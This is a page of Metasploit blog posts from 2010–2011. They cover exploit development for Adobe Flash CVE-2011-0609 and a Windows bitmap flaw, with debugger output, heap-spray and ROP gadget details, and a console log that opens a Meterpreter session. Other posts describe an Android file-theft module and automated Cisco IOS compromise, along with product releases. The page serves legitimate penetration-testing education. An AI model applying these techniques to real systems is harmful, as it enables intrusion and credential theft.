Skip navigation
All Places > Metasploit > Blog > Authors rapid7-admin
1 2 3 Previous Next


146 Posts authored by: rapid7-admin

Adobe Flash CVE-2011-0609

Posted by rapid7-admin Mar 26, 2011




Recently, I spent about a week and a half working on the latest 0-day Flash vulnerability. I released a working exploit on March 22nd 2011. The original exploit was just an attempt to get something working out the door for all of our users. The first attempt left a lot to be desired. To understand the crux of this vulnerability and what needed to be done to improve the first attempt at exploiting it I had to dig in deep into ActionScript.




ActionScript is a language which is embedded into an SWF file in the form of a bytecode stream. The embedded bytecode stream is handled by the ActionScript Virtual Machine (AVM) which is tasked with verifying the bytecode and generating native code. This process is commonly referred to as JIT (Just In Time) compiling.


The cause of this specific vulnerability is due to a one byte alteration (fuzzing) within an original well formed bytecode stream found in a file called addLabels.swf. The bytecode passes the verification process and the native code is generated and placed in VirtualAlloc()'d executable memory. The specific results of this code executing is that uninitialized memory is referenced.




  (fb4.9a0): Access violation - code c0000005 (!!! second chance !!!)
  eax=02b38c89 ebx=02b46b20 ecx=02b78040 edx=40027f2b esi=02b467c0 edi=02b5d1f0
  eip=02b7558e esp=0013e0e8 ebp=0013e180 iopl=0         nv up ei pl nz na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040202
  02b7558e 8b4a70          mov     ecx,dword ptr [edx+70h]

  0:000> dd eax+8
  02b38c91  40027f2b 21029780 0002b36d e8180000
  02b38ca1  01026d56 34800041 000263d9 08000000
  02b38cb1  0a000000 e8000000 01026d56 43800042
  02b38cc1  000263d9 05000000 0a000000 e8000000
  02b38cd1  01026d56 58800043 000263d9 0c000000
  02b38ce1  0a000000 e8000000 01026d56 7a800044
  02b38cf1  000263d9 06000000 0a000000 e8000000
  02b38d01  01026d56 9c800045 000263d9 08000000


  0:000> u eip
  02b7558e 8b4a70          mov     ecx,dword ptr [edx+70h]
  02b75591 8d559c          lea     edx,[ebp-64h]
  02b75594 89459c          mov     dword ptr [ebp-64h],eax
  02b75597 8b01            mov     eax,dword ptr [ecx]
  02b75599 52              push    edx
  02b7559a 6a00            push    0
  02b7559c 51              push    ecx
  02b7559d ffd0            call    eax




The memory being referenced is uninitialized. To control this memory heapspraying is required. The original exploit used heapspraying within JavaScript. This worked but it was not very reliable.




The solution was to preform the heapspray within a SWF file which loads the trigger SWF. Using from Roee Hay I was able to get some basic heapspraying accomplished. This is a lot more reliable because it is using the same Heap management routines Flash uses to allocate memory. A copy of the ActionScript source code I used for this exploit can be found in the source file.




Now that I have reliable control over the unintialized memory. Whats the next task? The next task is simply constructing the memory in such a way that the call eax instruction in the JIT code executes my shellcode. This was easily done using the good old Skylined technique of using an address which doubles as a nop instruction (0x0d0d0d0d ftw!).




The next major hurdle I had to over come was now that I have execution control what do I execute? While testing I was using a hardcoded payload within the ActionScript which simply executed calc.exe. This just was not going to cut it. A few initial options came to mind, I could hardcode a meterpreter payload. This was not very dynamic at all and so I had to come up with something else. The next option I thought of was using an egghunter payload to find shellcode I could inject in some other fashion. This would work but really limited things to a lot of payload specifics for example if the hardcoded egghunter payload was for a different architecture than the targeted machine things would blow up and break. That would be pretty tragic since all the conditions for getting a shell would be in place but everything breaks due to the dependencies of a hardcoded payload.




Finally, I came to conclusion I needed to find a way to dynamically read a payload using ActionScript. Now I can simply make a HTTP request for a text file and read in the ASCII hexadecimal representation of the payload. After decoding the payload it can be applied to the heapspray code and now we have dynamic payloads in memory. W00t!




   =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
   + -- --=[ 672 exploits - 345 auxiliary
   + -- --=[ 217 payloads - 27 encoders - 8 nops
      =[ svn r12149 updated today (2011.03.26)
   msf > use exploit/windows/browser/adobe_flashplayer_avm
   msf exploit(adobe_flashplayer_avm) > set URIPATH /
   URIPATH => /
   msf exploit(adobe_flashplayer_avm) > exploit
   [*] Exploit running as background job.
   [*] Started reverse handler on

   [*] Using URL:

   msf exploit(adobe_flashplayer_avm) >

   [*]  Local IP:

   [*] Server started.
   [*] Sending Adobe Flash Player AVM Bytecode Verification Vulnerability HTML to
   [*] Sending Exploit SWF
   [*] Sending stage (749056 bytes) to
   [*] Meterpreter session 1 opened ( -> at 2011-03-26 15:23:18 -0400
   [*] Session ID 1 ( -> processing InitialAutoRunScript 'migrate -f'
   [*] Current server process: iexplore.exe (2376)
   [*] Spawning a notepad.exe host process...
   [*] Migrating into process ID 4092
   [*] New server process: notepad.exe (4092)
   msf exploit(adobe_flashplayer_avm) > sessions


   Active sessions


   Id  Type                                   Information                                                                                Connection
   --   -------                                  ----------------                                                                                ----------------
   1   meterpreter x86/win32   WXPPROSP2-001\Administrator @ WXPPROSP2-001 ->



   msf exploit(adobe_flashplayer_avm) >



Thats the entire process it took to create a reliable exploit for this vulnerability. I hope you enjoy all the sessions =).

Originally Posted by hdm




Exploit reliability has been a primary goal of the Metasploit Framework since the beginning. We require all modules to be consistent, reliable, and in cases where targeting is tricky, for this to be reflected in the Exploit Rank and in the default target settings. This policy has resulted in us turning down community submissions and withholding exploits that just didn't quite make the cut for mass distribution. Over the years our core developers and contributors have amassed dozens of modules that suffer from minor flaws or require just a bit more time to get right. These modules tend to be forgotten and eventually lose compatibility with the rest of the framework.


This process is not optimal; even when a module isn't "done", it may still be useful as a proof of concept or as a starting point for another developer to bring it to the next step. A half-finished exploit still provides a level of technical insight into a vulnerability that is difficult to obtain from most public vulnerability databases.


In an effort to improve this situation, we are happy to announce the Metasploit Framework "unstable" module tree. This tree provides a place for rough cut modules and proof of concepts to be submitted, shared, and easily used by other members of the community. Once a module is improved to the point that it meets the standards for inclusion into the main tree, it will be merged over and available via the normal update mechanism. This provides a faster path for community developers to receive feedback and can serve as a reference for anyone interested in the exploit details of a flaw when no stable module is available.


To kick things off, we seeded this tree with fifteen modules from the Rapid7 module archive. Some of these exploits are nearly done, but suffer from minor issues related to automatic exploitation, or have compatibility problems with certain payloads. We hope the community finds these modules useful and submits their own "backlog" for the public to review and improve.


To use these modules, check out the new tree from Subversion and load them into the Metasploit Framework console. The simple way to do this is outlined below:



$ svn co ~/.msf3/unstable/
$ msfconsole -m ~/.msf3/unstable/



To load the unstable tree automatically on startup, enter the following commands into the msfconsole prompt.



msf> setg MsfModulePaths /home/USERNAME/.msf3/unstable/
msf> save



For developers who would like to submit modules, please create a Redmine ticket or send them via email at msfdev[at] Note that the Name field of the module should start with INCOMPLETE or UNRELIABLE depending on the status. This will indicate where it should live in the unstable tree and make it easy for folks to identify unstable modules via the standard console commands. The unstable tree is currently for modules only, but this does include Meterpreter scripts that have been ported to the new Post module format.



Originally Posted by todb




If you've been paying any attention to the open source security software space, you've probably noticed that one of our favorite tools, nmap, ships with a pretty serious scipting engine. NSE allows users to run scripted interactions on discovered services, and lately, the repository of those scripts has exploded. As of the 5.50 release of nmap, there are 177 scripts and 54 supporting libraries, covering all sorts of protocols you're likely run into during a pen-test engagement.



In order to capitalize on this work, I put together a Metasploit mixin to make development of Metasploit-driven NSE scripts pretty easy and straightforward, as well as an example Metasploit module to test for default Oracle database credentials. You can get a hold of these with a checkout from the svn repository:



svn co msf3



Modules that include Msf::Auxiliary::Nmap will now have a few handy methods available to them; most notably, the nmap_run() and nmap_hosts() methods. The first gets a hold of the locally-installed nmap binary and module-defined arguments, and runs the proscribed nmap scan and scripts configured by the module in a consistent, platform-independent way. Nmap_hosts() takes the XML log file produced by nmap_run(), parses out all the host nodes, and passes those back to the module to deal with as it will -- modules can format and display results on the console, log to the database, or perform more follow-on actions.



I'm really excited about the practical collaboration opportunities this integration creates between the nmap and Metasploit communities. If someone writes a wicked fast NSE script for doing interesting things on the network via nmap, Metasploit users can now pretty easily take advantage of the research. Metasploit has supported importing Nmap scan results for a while now, but this mechanism is more direct, more real-time, and can be more specialized to take advantage of specific NSE scripts.

Originally Posted by Chris Kirsch



All Metasploit editions are seeing an update to version 3.6 today, including an enhanced command-line feature set for increased proficiency and detailed PCI reports with pass/fail information for a comprehensive view of compliance posture with PCI regulations.


Here’s an overview of what’s new:


The new Metasploit Pro Console offers powerful new features that help professional penetration testers complete their job more efficiently in their preferred environment - whether it be command line or a graphical user interface.



Metasploit Pro Console - Only available in

Metasploit Pro, this console is for penetration testers who have become highly accustomed to the easy-to-use command-line interface of the Metasploit Framework, but also require the powerful automation capabilities of Metasploit Pro. With the addition of advanced network discovery, automated exploitation, evidence collection, smart brute forcing, and reporting capabilities to the existing features of the Metasploit Console, the results are immediately visible through the standard Web interface, allowing collaboration between team members using a mix of GUI and Console interfaces.


PCI Reporting - A feature only available in Metasploit Pro, which generates reports for PCI DSS compliance with pass/fail information for applicable PCI DSS requirements. The PCI standard requires both vulnerability management (11.2) and penetration tests (11.3); therefore, to facilitate compliance with requirement 11.3, Metasploit Pro now includes a detailed, actionable report on an organization’s security posture regarding requirements two, six and eight, which include password and secure systems maintenance. In addition, organizations can leverage Rapid7’s vulnerability management solution NeXpose® to comply with requirement 11.2.


Project Activity Report - A feature found in Metasploit Pro and Metasploit Express, organizations can now create a PDF report on the exact tests they run at the technical level. This enables clients of a penetration testing firm to retrace the steps that led to a successful assignment.


Asset Tagging - An advanced feature of Metasploit Pro that allows users to freely assign tags to assets based on multiple criteria such as compliance, operation workflow and team collaboration on different operational units. Tags may be used to classify assets and document security findings, with direct integration into the reporting engine. This facilitates improved project management and reporting, in particular for large penetration testing engagements.


Global Search - Found in Metasploit Pro and Metasploit Express, global search benefits users working on teams across various projects, with the ability to now search for tags, host names, IP addresses and annotations across projects and team members. This advanced search makes it easier to find information from previous projects or from other team members.


Post-Exploitation Modules - This feature, found in all Metasploit editions, includes more than a dozen modules that can be run on exploited systems to perform actions such as gathering additional information, pivoting to other networks and elevating system privileges. New post-exploitation modules can be quickly added by Rapid7 as part of the weekly product update. In addition, Metasploit Pro and Metasploit Express provide the ability to run post-exploitation modules on multiple systems simultaneously.


More exploits and auxilary modules - Since version 3.5.1, 14 exploits and 48 additional modules have been added to the Metasploit Framework, Metasploit Express and Metasploit Pro.

If you haven't tried Metasploit Pro yet,
get your free, fully featured Metasploit Pro trial.

Originally Posted by egypt




In coordination with Metasploit Express and Metasploit Pro, version 3.6 of the Metasploit Framework is now available.  Hot on the heels of 3.5.2, this release comes with 8 new exploits and 12 new auxiliaries.  A whopping 10 of those new auxiliary modules are Chris John Riley's foray into SAP, giving you the ability to extract a range of information from servers' management consoles via the SOAP interface.  This release fixes an annoying installer bug on Linux where Postgres would not automatically start on reboot. 


The feature I am most excited about is the new Post Exploitation support. I hinted at this new module type in the 3.5.2 release announcement and with 3.6, more than 20 new modules are available. Post modules are a new, more powerful, replacement for meterpreter scripts. Scripts were clearly tied to a single platform: meterpreter for Windows. With modules it is much easier to abstract common tasks into libraries for any platform that can expose a session. For example, file operations are common across all platforms -- windows/meterpreter, windows/shell, linux/shell, etc. Post modules can simply include Post::File and have access to platform-agnostic methods for interacting with the file system. In the near future, this sort of abstraction will be extended to Windows registry manipulation and service control.


Too much generality can make it difficult to access OS-level features and when you really need to get down and dirty with a session, you still can.  Post modules have a Session object exactly as meterpreter scripts did and you can still access all of the low-level methods available to it.  That means you can use railgun for performing complex system manipulation (e.g. smartlocker ) when necessary.  A major benefit of Post modules is the ability to easily include other mixins from the framework.  From a user's perspective, this means more consistent reporting and option handling than are currently available with scripts. This also opens the door to local exploits for a variety of platforms, including Windows, Linux, and even Cisco IOS through SSH and Telnet sessions.


Although post modules are meant to replace meterpreter scripts, scripts are not going away any time soon. We understand that many users still rely on private scripts for their post-exploitation needs and porting all of them to the new format will take time. So while we will be favoring module contributions over scripts, that doesn't mean your private code is suddenly going to stop working.


This is an exciting release. As always, it is immediately available from the
Metasploit Framework downloads page

Originally Posted by egypt



The Metasploit Framework is more than a pile of exploits; it is a collection of tools for gaining access where none is provided and a scaffolding for building new tools.  In a few weeks I will be teaching two, one-day dojos at CanSecWest focusing on using and extending the framework.  Some of the topics we will cover are: post-exploitation automation including meterpreter and cmd/sh shell sessions, no-exploit pwnage using stolen credentials of various types, and building your own scanners, bruteforce modules and plugins.  If you use Metasploit regularly but never felt like you could dig into the code and make it do new and awesome things, this is the class for you.  If you spend a lot of time writing one-off scripts to solve problems on a pentest, this class is for you.  If you have played with Metasploit but never used it to its full potential, this class is for you.


People have told me they don't have the necessary programming experience to get their hands dirty with Metasploit's code or that they use another language and "don't know Ruby." Without getting into the scripting-language holy wars, Ruby is very easy to learn. Don't be intimidated, programming for the Metasploit Framework is easy. The amount of programming knowledge needed to write modules is well within the grasp of most pentesters and anyone with exploit-development skills or other programming experience will be able to hit the ground running. When you have an idea for an awesome tool, or for improving the way it works, don't wait for someone else to do it. Take this class to learn how to mold the Framework to suit your needs.


If this sounds like something you're interested in, please sign up: Monday, March 7th or Tuesday, March 8th .

Originally Posted by egypt




On February 1st, Eduardo Prado of Secumania notified us of a privilege escalation vulnerability on multi-user Windows installations of the Metasploit Framework.  The problem was due to inherited permissions that allowed an unprivileged user to write files in the Metasploit installation directory.  Today we are releasing version 3.5.2 to fix this vulnerability.  The new installers fix this issue through two changes: first, we've moved the default installation to %ProgramFiles%, which does not normally allow non-admin write access; second, we explicitly remove any inherited permissions for the "Users" and "Authenticated Users" groups.  For users who prefer not to re-install Metasploit, you can use the following commands to fix the problem:


Vista and newer:


icacls c:\framework /inheritance:d /t
icacls c:\framework /remove *S-1-5-32-545 /t
icacls c:\framework /remove *S-1-5-11 /t


For systems older than Vista, you will need the xcacls.vbs tool available from Microsoft


xcacls.vbs c:\framework /E /R SID#S-1-5-32-545 /T

Note that the "Authenticated Users" group doesn't exist before Vista, so you only need to remove "Users".


This issue is mitigated by the fact that it only affects multi-user Windows installations with low-privileged accounts, a scenario we believe to be a small percentage of our users.


In addition to fixing this vulnerability, the 3.5.2 release fixes over 50 bugs and contains 39 new modules.  Also included in this release is a revamped WMAP courtesy of Efrain Torres, improvements to Meterpreter's railgun extension thanks to chao-mu, and a fledgling version of Post Exploitation modules (a more powerful replacement for Meterpreter scripts). Raphael Mudge's Armitage was also integrated in this release. Post modules are still in their infancy and will likely be much improved in the next release.

Originally Posted by jduck



In the final days of 2010, an exploit for the Windows CreateSizedDIBSECTION vulnerability was added to the Metasploit trunk. The trigger bitmap was taken byte-for-byte from Moti and Xu Hao's slides from the Power of Community conference. However, the method for achieving code execution on Windows XP was slightly different.


Since this vulnerability is basically equivalent to "memcpy(stack_buffer, user_input, -1);", the most reliable road to exploitation is achieved using an SEH overwrite. Unfortunately, Windows XP SP2 and later protects all modules loaded in Explorer.exe with SafeSEH. Additionally, Windows opts in to DEP/NX for Windows Explorer by default. Therefore, both DEP and SafeSEH must be bypassed for successful exploitation.


In order to accomplish that feat, Moti and Xu Hao used the "l3codeca.acm" module. Sadly, that module didn't get loaded during my tests. I later found that it loads when determining the duration of video in the "Details" view mode. Still, relying on two different Explorer window view modes seemed like a bad idea. So I looked for another way.


After a minute or so, the "msacm32.drv" module gets loaded into Windows Explorer's address space. This module is presumably used for handling something to do with ACM sound, but that's largely unimportant. It does mean that this technique will only work on Windows XP machines that have a compatible sound device though. The key fact is that this module isn't protected by SafeSEH! Win! We can use any address in the code segment of this library as our fake SEH handler.


So, now the problem is how to leverage this module to kick off a ROP-stage. At first I was a bit frazzled and rather than deduce the solution logically, I used a technique I like to call trigger-fuzzing. That is, I repeatedly triggered the vulnerability each address in "msacm32.drv" code segment and monitored the results. After less than 512 attempts, I noticed I had a crash with EIP containing the tell-tale Rex::Text pattern.


After investigating the instruction sequence that led to EIP control, I realized the beauty of it. Trigger-fuzzing had led me to a technique that enables replacing pop/pop/ret addresses with something turning them into ROP fairly easily. The magic sauce boils down to this:



mov reg32, [esp+8]
call [reg32+off]



As you can see, this will load the address of the SEH record from the stack, then use it's contents for the next gadget. As a bonus, we now have the address of the exception record in a register and can easily reference our payload (since we already know the SEH record offset in our buffer).


Of course, this isn't exactly breaking information, Nor is it the only instruction sequence that will work. While chatting with Peter Van Eeckhoutte, he pointed out that a similar gadget is on the corelan wallpaper. Here are some other possible instructions that could work, just to get your creative juices flowing.



mov reg,[ebp+0c] + call [reg] (from corelan wallpaper)
mov reg, fs:[0] / ... / ret (also from corelan wallpaper)
pop regX / pop regY / pop regZ / call [regZ+8]
push regX / mov regY,[esp+0xc] / call [regY+0xc]
mov regY, [ebp+0xc] / push [regY-0x4] / ret
mov regY, fs:[0] / mov reg, [regY-0x8] / jmp reg



The question that remains -- Which sequences are most common? Is there anything as common as Pop/Pop/Ret?


PS. If you're interested in these kinds of things, we're hiring! See our previous blog post, and try not to be too intimidated :-)

Originally Posted by jduck



After the incredible success of the Metasploit Express and Metasploit Pro product launches last year, we are happy to announce a new position on the Rapid7 Metasploit team. Effective immediately, we are seeking a self-driven Exploit Engineer to join the team of full-time Metasploit developers. 


Job duties include researching vulnerabilities and writing exploit code in the form of Metasploit modules (Ruby). Exploit modules will be released to the public under the BSD open source license. 


The ideal candidate will primarily work from home, but will meet with team members approximately once a week in Austin, TX. However, exceptions may be made for the perfect candidate. Candidates must have the right to work in the United States.


Benefits include:


  • Competitive salary and bonus plan
  • Health care and medical benefits
  • Paid to contribute to an open-source project
  • Exploits publicly released under BSD license

A candidate must have a solid understanding of:


  • Common vulnerability classes
  • State-of-the-art exploitation techniques
  • Programming in Ruby, C, C++, and x86 assembly
  • Common networking protocols (TCP/IP and related protocols)
  • Network and system administation of a lab environment
  • Using debuggers and disassemblers (WinDbg, IDA Pro)
  • Binary patch diffing (BinDiff or otherwise)
  • Common operating system implementations (Windows, Linux, etc)

In addition to the requirements, we prefer candidates who have experience:


  • Developing exploits using the Metasploit Framework
  • Reverse engineering compiled applications
  • SMT/SAT solvers
  • Various run-time analysis techniques
  • Dynamic Binary Instrumentation/Translation
  • Fuzz-testing
  • Programming in other assembly languages, such as ARM, PPC, SPARC, MIPS
  • Embedded device research and exploitation

All interested parties should email their resumes to jobs[at]

Originally Posted by jduck



Back in November, Thomas Cannon brought to light an issue within the Android operating system. Specifically, he found that it was possible to obtain the contents of files on an Android device by simply persuading its owner to visit a web site under attacker control. The issue only garners a 3.5 CVSS score, but yet it’s still fairly serious.


Thomas reported this issue responsibly to Google and they took it seriously. However, since then they have come back with a ridiculous remediation plan. Granted, its probably not entirely Google’s fault, but the overall situation looks very bleak for Android.


The problem is that Google stated that a fix will be available as part of an update to the upcoming Android 2.3. While that, in itself, may not be totally ridiculous, the reality of the situation is that Google is only one party involved in Android. There are two other groups, namely OEMs and Carriers, that must also do their part in getting the fix to users. Although Android devices are becoming increasingly functional, the security posture remains abysmal.


The security posture for desktop applications has improved vastly with all of the sand-boxing, automatic updates, and various other exploit mitigation technologies. Meanwhile, Android includes almost none of existing security protections. In fact, mobile users are being left out in the cold, unable to get a patch for a trivially exploitable cross-zone issue. For that matter, they can’t even control whether their device’s browser automatically downloads files or not.


This situation is not news, rather it is a sad fact. It is totally unfair for end users to be left out to fend for themselves. After all, they are paying a small fortune for these devices and the service to be able to use them. Hopefully the vendors involved will wake up before a network worm outbreak occurs.


Originally, Thomas disclosed the details of his bug on his blog. Later, he removed some details to help protect users. I believe that responsible disclosure is a two-way street that requires responsibility on both sides. Since Google, OEMs, and carriers all continue to act irresponsibly, it is necessary bring more attention to this issue and the situation as a whole.


I spent a little time and managed to recreate the issue with nothing more than HTML and JavaScript. As of today, I have released a Metasploit module to take advantage of the flaw. It is available in the latest copy of our Framework product, or you can view the source via the link to our Redmine project tracker above.


Before I go deeper into the consequence of this bug, I want to point out that Thomas outlined several workarounds for this vulnerability in his blog.


Now, take a deep breath give some thanks to the fact that, under Android, most every process runs under a separate, confined, unix-style user account. This design feature partially mitigates this issue, lowering confidentiality impact to “Partial” and bringing the CVSS score from 5 to 3.5. That said, an attacker can still gain access to some pretty interesting stuff.


For starters, an attacker can steal any world-readable file. In my tests it was possible to get potentially sensitive information from the within the “proc” file system. This type of information could include kernel versions, addresses, or configuration that can be used enhance further attacks.


Also, you can snarf any files that are used by the browser itself. This includes bookmarks, history, and likely more. This kind of information could potentially be embarrassing or possibly even give an attacker access to any saved passwords or session cookies you might have stored.


Perhaps the easiest win though, is that you can grab anything off of the SD card. You might ask, “Anything?! What about the user separation?” Well, because the SD card has been formatted with the “vfat” (aka “fat32”) file system, there is no concept of ownership. All files are owned by the same user id since the file system itself cannot encapsulate who created which file. As Thomas said, files in the SD card that have predictable names are ripe for the picking. This includes pictures and movies. These may in fact be some of the most private data on your device.


In conclusion, I hope that the Android security debacle will get resolved as soon as possible. If Google, OEMs, and carriers can’t work it out, perhaps another party will step in to maintain the operating system. I believe this could be very similar to the way various Linux distributions operate today. If the situation is not resolved, I fear the Android device pool could become a seething cesspool of malicious code...

Originally Posted by HD Moore



The Metasploit Framework and the commercial Metasploit products have always provided features for assessing the security of network devices. With the latest release, we took this a step further and focused on accelerating the penetration testing process for Cisco IOS devices. While the individual modules and supporting libraries were added to the open source framework, the commercial products can now chain these modules together to quickly compromise all vulnerable devices on the network. The screen shot below gives you an idea of what a successful penetration test can look like:  






To begin with, I should state that a properly configured Cisco device is a tough target to crack. Vulnerabilities exist in IOS, just like any other piece of software, but only a few folks have managed to leverage memory corruption flaws into code execution. For this reason, the majority of real-world attacks against IOS devices tend to focus on two areas: poor configuration and weak passwords. 

Before we dive into the specifics, lets review the current "state of the art" in Cisco IOS security testing.  Vulnerability scanners do a great job of identifying out of date IOS installations by comparing version strings. This works well for determining whether  a device is patched, but doesn't help a penetration tester who doesn't have a deep background in IOS exploitation. With few exceptions, this leaves a small number of services that are commonly exposed in production environments. These services include SNMP, Telnet, SSH, and HTTP. You may also find Finger running or relay services for media protocols like SIP and H.323. For remote access, the first four are what most of us have to work with, and even then, its rare to find a properly configured router with any of those services exposed to the network at large. 

The Cisco IOS HTTP service has a few well-known vulnerabilities on older versions of the operating system. The two we care about as penetration testers both relate to authentication bypass. The first flaw,
CVE-2000-0945, relates to missing authentication in the IOS Device Manager interface. This vulnerability allows unauthenticated, often privileged access to the IOS installation through the web interface. The second vulnerability, CVE-02001-0537, allows an attacker to bypass authentication by specifying an authentication level higher than "15" in the request to the HTTP service. This also provides privileged access to the device through the web interface. The open source Metasploit Framework now provides two modules for exploiting these vulnerabilities: 

/auxiliary/scanner/http/cisco_device_manager2. /auxiliary/scanner/http/cisco_ios_auth_bypass


Metasploit Express and Metasploit Pro will automatically recognize Cisco IOS HTTP services during a discovery scan, check for these two flaws, and exploit them to gain access to the running device configuration. 

In addition to these two known vulnerabilities, the device password can also be determined through a brute force attack on the HTTP service. The HTTP protocol is relatively quick to brute force, compared to slower,  terminal-based services like Telnet and SSH.  Metasploit Express and Metasploit Pro will automatically grab the running device configuration after a successful HTTP brute force of an IOS device. 

The next service I want to discuss is SNMP. Oddly enough, SNMP is often left exposed on otherwise secure routers. The reason for this may be the general view of what SNMP is and does. The Simple Network Management Protocol is great for polling information across a wide range of systems in a standard format. Regardless of who built your switch or router, just about any SNMP client and monitoring software will work with that device, provided SNMP is enabled and configured. 

What many network administrators don't realize, is not only the depth of information exposed by SNMP but the fact that a writeable SNMP community can be leveraged to gain complete control over a device.  In the case of Cisco IOS, a writeable SNMP community can be used to download the running device configuration AND modify the running configuration. A router with telnet disabled and a complex serial password can be hijacked nearly instantly through a writeable SNMP community.  The Metasploit Framework provides a
SNMP brute force tool, written as an auxiliary module, which can leverage a wordlist of common passwords to identify valid communities and determine whether they are read-only or read-write.  In addition to the basic brute force module, Metasploit now contains a module (submitted by community contributor "pello"), that can use a writeable SNMP community to download the running device configuration. 

Metasploit Express and Metasploit Pro use these two modules to automatically grab the configuration files of vulnerable devices. During a discovery scan, the SNMP brute force tool is launched in the background with a small wordlist of common communities. If any of these passwords work and the community is detected as writeable, the product will configure a local TFTP service and download the running configuration file.  Since the SNMP protocol is now integrated into the intelligent brute force component of the product, the same now applies to communities guessed during a brute force run. The brute force component uses a highly tuned list of communities in addition to the dynamically generated passwords for that project. This tuned list is derived from a research project that involved scraping web forms for pasted configuration files, extracting and brute forcing the embedded passwords, and then analyzing the results to determine what passwords are most commonly used, including SNMP communities.  The results of this project were surprising, I would never have  guessed that "public@es0" and "private@es0" were widely used due to an example configuration included in the
Cisco documentation


.  The last two protocols I want to discuss are Telnet and SSH. These protocols both provide access to a remote command shell on the target device, usually as non-privileged user. The most notable difference from penetration testing perspective, is that SSH often requires knowledge of a remote username and password, where Telnet is often configured with password-only authentication.  The Metasploit Framework contains modules for brute forcing both of these protocols and will automatically create an interactive session when the brute force process succeeds. 

Metasploit Express and Metasploit Pro have always supported attacks against network devices using the Telnet and SSH protocols, but with the latest release, now leverage the tuned password list from our password analytics research. This results in some unusual passwords floating to the top of the wordlist, but is extremely effective against real-world configurations. Without giving too much away, I can say that some ISPs are notorious for using static passwords to configure customer-owned equipment. 

After a session has been established through the Telnet or SSH protocols on a Cisco IOS device, the Evidence Collection feature in the commercial products will automatically grab the version information, active user list, and attempt to brute force the enable password with a list of common passwords. If the collection script is able to gain enable access, it will automatically dump additional information from the system, including the running configuration. 

The attacks listed above are not anything new. What is new is the ease that they can be carried out using Metasploit and the ability of the commercial products to chain them together to automatically compromise vulnerable devices. These attacks are just an extension of our existing coverage and a hint of what  is on the roadmap for future development of our commercial products. 

One thing I haven't mentioned so far is what we actually do with the Cisco IOS configuration files after we capture them. These files contain the running configuration of the device, this includes the vty passwords, enable passwords, VPN keys, SSL certifications, and WiFi credentials. Metaspoit will automatically parse these configuration files to scrape out sensitive data and store it as either evidence of a compromise or as stolen authentication credentials. The screen shot below demonstrates the output of brute forcing the Telnet vty password, then the enable password, then dumping and parsing the configuration:  



Metasploit Express and Metasploit Pro can automatically recycle credentials obtained from these configuration files to gain access to other devices on the network. If you crack one Cisco device through a weak SNMP community and discover that the vty password is "ciscorules!", you can use the "known-only" profile of the brute force component to automatically try this password, via any protocol, against any other device on the network. Once you gain access to other devices, the configuration files are obtained  and the entire process starts again. You can easily apply a password taken from a Cisco router against the login page of an intranet site or leverage a password obtained through a traditional exploit to gain access to a multitude of network devices.  One of our development goals is  to ensure that our users can always identify and exploit the weakest link on a given network. 

That's it for this post,  please give the new features a whirl and let us know via comments if you have any questions or suggestions for improvements.


Originally Posted by Matt Barrett



This week the guys over at Offensive Security officially added Metasploit Pro to their curriculum for the class Pentration Testing with Backtrack. For those not familiar with it, BackTrack is a Linux distribution that includes a lot of tools for penetration testing. Since 2006, it has been downloaded three million times and has become the most widely used collection of penetration testing tools. BackTrack is funded by Offensive Security who, in turn, teach people how to use it.

Penetration Testing with BackTrack (PWB) is a phenomenal course that is well respected in corporate and open source circles alike. The fact that Metasploit Pro is now included in the course is excellent - and it makes sense. Feedback from industry experts on VPN pivoting in Metasploit Pro has been fantastic (check out this
VPN pivoting introduction and this VPN pivoting how-to) but the question that keeps coming up is: What can I do once I have set up a VPN pivot?

          Penetration testers using Metasploit Pro can now route all BackTrack
           Linux tools through a compromised target using VPN pivoting

  Installing Metasploit Pro on BackTrack answers that question ten-fold. BackTrack has a ridiculous amount of reconnaissance, analysis and attack tools for you to choose from. In addition to running Metasploit Pro, how about some packet analysis with Wireshark? Maybe a nice man-in-the-middle attack to intercept PII (personally identifiable information) with Ettercap? How about we find a vulnerable wireless access point and clone it to grab everything from everybody using Karmetasploit (also an HD Moore project)? Using Metasploit Pro's VPN pivoting, you can tunnel all of these tools through a pwned host.   

There are over 300 different tools that ship with BackTrack for every type of penetration testing work imaginable. Once you open the door with Metasploit Pro, the sky is the limit. You can find the Offensive Security blogpost
here. An excerpt:





"On a more personal note, like many people, I was a little uncertain when  hearing about the acquisition of Metasploit by Rapid7 but they have demonstrated that they are dedicatedto keeping the open-source version of Metasploit alive and well and Metasploit Pro is clearly an excellent product. From the ability to import multiple external file formats to the VPN pivoting to thewide range of reporting options, Metasploit Pro will be a great timesaver for those who choose to use it as their penetration testing tool of choice."


A big thank-you shout out to our friends at Offensive Security!

Originally Posted by Chris Kirsch



Secret passwords don’t only get you into Aladdin’s cave or the tree house, but also into corporate networks and bank accounts. Yet, they are one of the weakest ways to protect access. Sure, there are better ways to secure access, such as smart cards or one-time password tokens, but these are still far from being deployed everywhere although the technology has matured considerably over the past years. Passwords are still the easiest way into a network. 

The new Metasploit version 3.5.1 adds a lot of features to audit your network’s password security on many levels. Metasploit has always offered a broad range of brute forcing capabilities. Since version 3.5.1, it now also downloads the configuration files of Cisco routers and extracts their passwords. HD’s team has also added brute forcing of UNIX “r” services, such as rshell, rlogin and rexec, as well as VNC and SNMP services. Metasploit can also now import pcap network traffic logs to find clear text passwords, and to discover hosts and services. 

Metasploit has also become stealthier than ever: It now flies under the radar of intrusion detection (IDS) and intrusion prevention systems (IPS). An enhanced anti-virus evasion ensures that exploits are not stopped by end-point defenses. 

And for those of you enjoying a good cup of coffee while well-meaning end users do your job, we’ve added email attachments to social engineering campaigns that enable you to send out malicious PDF and MP3 files. 

Metasploit now provides additional exploits for SAP BusinessObjects, Exim mail servers, ProFTPD file transfer installations, SCADA deployments (BACnet, Citect, DATAC), Novell NetWare servers, Microsoft Internet Explorer, and browser plugins such as Adobe Flash and Oracle Java. 

The new Metasploit version 3.5.1 is available for both the free, open source Metasploit Framework and the commercial editions Metasploit Express and Metasploit Pro. Here is an overview of the new features: 

Overview of the features added in version 3.5.1:



Network security
Comprehensive Cisco device exploitation
Additional network device audit and exploitationXXX
Enhanced performance for port scans and host discovery
Network traffic analysis using pcap packet capturesXXX
Brute forcing
Brute force support for Unix “r” Services (rshell, rlogin, rexec)XXX
Brute force support for VNC desktop servicesXXX
Brute force support for SNMP (devices)XXX
New IDS/IPS evasion options for automated exploitation
Improved anti-virus evasion for executable templates

Social Engineering
File-format exploits now available for email campaigns (attach malicious PDF, MP3, etc)

Web application security
Import and validate results web application scanners
VPN pivoting for Metasploit on Windows

